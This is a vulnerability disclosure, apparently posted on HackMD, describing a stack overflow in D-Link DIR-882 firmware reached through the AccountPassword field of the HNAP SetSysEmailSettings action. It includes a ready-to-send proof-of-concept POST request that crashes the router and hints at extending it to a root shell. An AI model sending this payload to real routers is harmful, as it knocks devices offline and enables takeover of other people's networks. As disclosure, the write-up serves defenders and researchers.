โHackMD
D-link DIR882-2
tags: D-Link DIR-882
vendor:D-link
product:DIR882
version:DIR882A1_FW130B06.bin
type:Stack Overflow
author:Yifeng Li, Wolin Zhuang;
Vulnerability Details
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
In module SetSysEmailSettings,the content obtained by the program through SetSysEmailSettings/AccountPassword is passed to v2, which is controllable for attacker and copied to variable v11 which is passed into fuction decrypt_aes as a parameter.
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
After that, it is passed into function sub_426D74 as the first parameter as a2.Besides, we notice that local variable v6 is placed on the stack, which is also passed into function sub_426D74 as the second parameter.
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
In function sub_426D74, the for loop from line 26 to line 32, first copy a1 to v7 then strtol transfer v7 to a2, which briefly, a2 equals hexdecode(a1).Let's start over again, a1, comes from a2 in function decrypt_aes, a variable is controllable to the attacker.And a2 comes from v6 in function decrypt_aes which is placed on the stack, so when we copy a1 to a2 in sub_426D74, we are basically putting v4's value into v6, which leads to a stack overflow vulnerbility .
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Recurring vulnerabilities and POC
In order to reproduce the vulnerability, the following steps can be followed:
In order to reproduce the vulnerability, the following steps can be followed:
- Install firmware DIR882A1_FW130B06.bin to router DIR882
- Login to 192.168.0.1 as admin
- Attack with the following POC
Image Not Showing Possible Reasons- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
Content-Length: 1025
Accept: text/xml
HNAP_AUTH: A5E647B81CF1521162A5597FC946BB87 1669785103202
SOAPACTION: "http://purenetworks.com/HNAP1/SetSysEmailSettings"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: text/xml
Origin: http://192.168.0.1
Referer: http://192.168.0.1/SystemLog.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uid=UxTiwg3g
Connection: close
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SetSysEmailSettings xmlns="http://purenetworks.com/HNAP1/">
<SysEmail>true</SysEmail>
<EmailFrom>admin@qq.com</EmailFrom>
<EmailTo>admin@qq.com</EmailTo>
<EmailSubject/>
<SMTPServerAddress>admin</SMTPServerAddress>
<SMTPServerPort>1080</SMTPServerPort>
<Authentication>true</Authentication>
<AccountName>admin</AccountName>
<AccountPassword>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</AccountPassword>
<OnLogFull>false</OnLogFull>
<OnSchedule>false</OnSchedule>
<ScheduleName>Always</ScheduleName>
</SetSysEmailSettings>
</soap:Body>
</soap:Envelope>
By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to dos circunstance.You can write your own exp to get the root shell.
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
